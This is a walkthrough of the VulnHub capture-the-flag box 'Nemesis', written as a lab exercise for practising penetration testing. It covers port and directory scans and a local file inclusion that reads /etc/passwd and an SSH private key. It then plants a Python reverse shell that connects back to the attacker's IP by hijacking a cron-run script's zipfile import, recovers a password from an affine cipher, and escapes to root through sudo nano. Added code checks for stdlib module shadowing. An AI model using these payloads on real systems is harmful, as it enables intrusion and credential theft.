Penetration practice: VulnHub box Nemesis
2022-07-01 17:40:00 【It's safe to go to school on Fubo road】
No.28 Nemesis
Target information
Download address:
https://www.vulnhub.com/entry/ia-nemesis-101,582/
Range: VulnHub.com
Target name: IA: Nemesis (1.0.1)
Difficulty: medium to hard
Release date: 25 October 2020
Hint:
This box is meant to improve Linux privilege escalation and CMS skills. I hope you like it.
Goal: 2 flags
Experimental environment
Attacker: VMware Kali, 192.168.7.3
Target: VirtualBox Linux, IP assigned automatically
Information gathering
Host scan
Scan the LAN for the target's IP address
sudo nmap -sP 192.168.7.1/24

The target is found at 192.168.7.166
Port scan
Scan the target's open service ports
sudo nmap -sC -sV -p- 192.168.7.166 -oN Nemesis.nmap

Three open ports are found: 80 (HTTP), 52845 (HTTP) and 52846 (SSH). Visit port 80 first.
Web penetration
http://192.168.7.166

The home page shows some hints: we are asked to find the bug and fix it. Start with a directory scan.
Directory scanning
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.166 -x php,html,txt,zip

The scan finds contact.php and robots.txt. Download robots.txt and see what it contains.
wget http://192.168.7.166/robots.txt
cat robots.txt

The hint tells us to find the real vulnerability. Now look at what contact.php is.
http://192.168.7.166/contact.php

A normal-looking page, but the source code contains some hints:

a piece of PHP code that takes 3 parameters and echoes 1 of them. Let's try it.
http://192.168.7.166/contact.php?name=a&email=b&message=ls
http://192.168.7.166/contact.php?name=a&email=b&message=../../../../etc/passwd
Nothing is echoed, so maybe the injection point is not here. The source of the login.html page contains some information.
http://192.168.7.166/login.html

It looks like a username and password; note them down. There is also a page thanoscarlos.html; visit it.

No useful information there; visit port 52845.
http://192.168.7.166:52845

This is a site built from an HTML5 template. Under Contact Us I find content very similar to the hints on the earlier PHP page.


The same 3 parameters again; let's try them.


After submission a popup says the message was saved to a file. Since a file is involved, maybe there is a file inclusion; try again.
Local file inclusion vulnerability


After submission the contents of the passwd file appear; look at the page source.

Two users have a login shell. The user thanos listed below, together with hacker_in_the_town shown on the earlier login.html page, might be a username and password. Try logging in over SSH (one was missed here).
ssh thanos@192.168.7.166 -p 52846

Login requires public-key authentication, so try to read the thanos user's SSH private key (id_rsa) from the home directory.
Payload:
message=../../../../home/thanos/.ssh/id_rsa&submit=

The key file is read successfully; save it and log in again.
ssh thanos@192.168.7.166 -p 52846 -i id_rsa

Look at what is in the home directory
ls -al
cat flag1.txt

There is a backup Python script and flag1.txt. Look at the content of backup.py.
cat backup.py

This script backs up the /var/www/html directory to /tmp/website.zip.
There is another user directory, carlos, under /home; accessing it gives a permission error. Look for the right information.
Running sudo -l confirms that hacker_in_the_town is not thanos's password, and no SUID binary is usable, so upload pspy64.
Start an HTTP server on the Kali attack machine
python3 -m http.server
Download pspy64 on the target
wget http://192.168.7.3:8000/pspy64
Make pspy64 executable and run it
chmod +x pspy64
./pspy64


The user with UID 1000 runs the backup.py script every minute.

This UID is the carlos user, so the script can be used to escalate privileges. Look at the script again.
cat backup.py

It imports zipfile, so we can create a zipfile.py in the same directory as backup.py.
On the Kali attack machine, listen on port 4444 first
nc -lvvp 4444

Create a zipfile.py file with the following content
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.7.3",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Start the HTTP server
python3 -m http.server

Download zipfile.py on the target
wget http://192.168.7.3:8000/zipfile.py

Wait a moment and the target will run backup.py automatically
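Why the shadowing works, and how a defender checks for it: Python puts the running script's own directory first on sys.path, so any stdlib module name can be shadowed by a file in a directory writable by a less privileged user. The following check is an added example, not the box's or the write-up's code; it lists files in a directory that collide with stdlib module names and verifies that an imported module was loaded from the interpreter's stdlib. It assumes Python 3.10+ for sys.stdlib_module_names (older versions fall back to a short list); the directory and file names in demo() are constructed.

```python
"""Find files in a script's directory that shadow Python stdlib modules.
A rogue zipfile.py beside backup.py is imported instead of the real zipfile module."""
import os
import sys
import sysconfig
import tempfile

# sys.stdlib_module_names exists from Python 3.10; older versions get a short fallback list.
STDLIB_NAMES = frozenset(
    getattr(sys, "stdlib_module_names", {"zipfile", "os", "sys", "subprocess", "socket"})
)
MODULE_SUFFIXES = (".py", ".pyc", ".so", ".pyd")


def shadowed_stdlib_modules(script_dir):
    """Return sorted names of modules or packages in script_dir that collide with the stdlib."""
    found = set()
    for entry in os.listdir(script_dir):
        name, ext = os.path.splitext(entry)
        full = os.path.join(script_dir, entry)
        is_module = ext in MODULE_SUFFIXES and os.path.isfile(full)
        is_package = ext == "" and os.path.isdir(full)
        if (is_module or is_package) and name in STDLIB_NAMES:
            found.add(name)
    return sorted(found)


def module_path_is_stdlib(path):
    """True if a module's __file__ lies under the interpreter's stdlib directory.
    None (built-in or frozen module, no file) cannot be shadowed this way and passes."""
    if path is None:
        return True
    stdlib = os.path.realpath(sysconfig.get_paths()["stdlib"])
    return os.path.realpath(path).startswith(stdlib + os.sep)


def module_is_stdlib(mod):
    """Apply module_path_is_stdlib() to an already-imported module object."""
    return module_path_is_stdlib(getattr(mod, "__file__", None))


def demo():
    """Constructed scenario: backup.py next to a rogue zipfile.py, as on this box."""
    with tempfile.TemporaryDirectory() as d:
        for fname in ("backup.py", "zipfile.py", "notes.txt"):
            open(os.path.join(d, fname), "w").close()
        return shadowed_stdlib_modules(d)  # -> ['zipfile']
```

Running shadowed_stdlib_modules() against the directory of every script a cron job or sudo rule executes, and module_is_stdlib() inside such scripts, surfaces exactly the condition exploited here.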

The reverse shell comes back; switch to an interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Press Ctrl+Z
stty -a
stty raw -echo;fg
reset

Done; look at what is in the carlos user's home directory
ls -al

View flag2.txt
cat flag2.txt

That is the 2nd flag. Look at root.txt too
cat root.txt

root.txt says that the carlos user's password has been encrypted and the encryption code is in encrypt.py. Let's recover the encrypted content; the format is
************FUN********
Look at what is in the encrypt.py script
cat encrypt.py

The script shows that it uses an affine cipher; the ciphertext is
FAJSRWOXLAXDQZAWNDDVLSU
Go to dcode.fr and have a look. Note: with this site, be sure to wait until everything has loaded, otherwise the operation fails.
https://www.dcode.fr/chiffre-affine

The solution is on the left. Following the format given earlier, the match is
ENCRYPTIONISFUNPASSWORD
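The same recovery done offline in code, as an added example that is not the box's encrypt.py or the write-up's code: an affine cipher maps p to (a*p + b) mod 26 with gcd(a, 26) = 1, so there are only 312 keys, and the format hint from root.txt alone pins the key down. The ciphertext and hint are the page's own values; the key the code recovers is computed here, not taken from the page.

```python
"""Recover an affine-cipher key from a positional hint and decrypt the ciphertext.
Keyspace is 12 * 26 = 312, so a few known plaintext positions identify the key."""
from math import gcd
from string import ascii_uppercase as ALPHA

M = len(ALPHA)  # 26

# Values from the write-up: the ciphertext shown by encrypt.py and the format hint in root.txt.
CIPHERTEXT = "FAJSRWOXLAXDQZAWNDDVLSU"
HINT = "************FUN********"


def affine_encrypt(plain, a, b):
    """Encrypt A-Z plaintext with key (a, b): c = (a*p + b) mod 26."""
    return "".join(ALPHA[(a * ALPHA.index(ch) + b) % M] for ch in plain)


def affine_decrypt(cipher, a, b):
    """Decrypt with p = a^-1 * (c - b) mod 26; pow(a, -1, M) is the modular inverse (Python 3.8+)."""
    a_inv = pow(a, -1, M)
    return "".join(ALPHA[(a_inv * (ALPHA.index(ch) - b)) % M] for ch in cipher)


def all_keys():
    """Every valid key: a coprime with 26, b any shift."""
    return [(a, b) for a in range(1, M) if gcd(a, M) == 1 for b in range(M)]


def matches_hint(text, hint):
    """True if text agrees with hint at every position that is not a '*' wildcard."""
    return len(text) == len(hint) and all(h == "*" or h == t for t, h in zip(text, hint))


def recover_keys(cipher, hint):
    """Brute-force the whole keyspace and keep keys whose decryption fits the hint."""
    return [(a, b) for a, b in all_keys() if matches_hint(affine_decrypt(cipher, a, b), hint)]


def recover_password(cipher=CIPHERTEXT, hint=HINT):
    """Return the unique plaintext if the hint pins down exactly one key, else None."""
    keys = recover_keys(cipher, hint)
    if len(keys) != 1:
        return None
    a, b = keys[0]
    return affine_decrypt(cipher, a, b)  # -> 'ENCRYPTIONISFUNPASSWORD' for the box's values
```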
Use this password to run sudo
sudo -l
Enter the password ENCRYPTIONISFUNPASSWORD

The password is correct, and sudo allows running nano as root.
sudo /bin/nano /opt/priv
Ctrl + r
Ctrl + x
reset; sh 1>&0 2>&0
Nothing appears on screen after typing this, but privilege escalation has actually succeeded, as typing id shows
id

It looks a bit awkward, so use Python to switch to an interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
cd /root
ls

cat root.txt

root.txt obtained; game over. If you like these boxes, search WeChat for the official account “It's safe to go to school on Fubo road” for more range write-ups.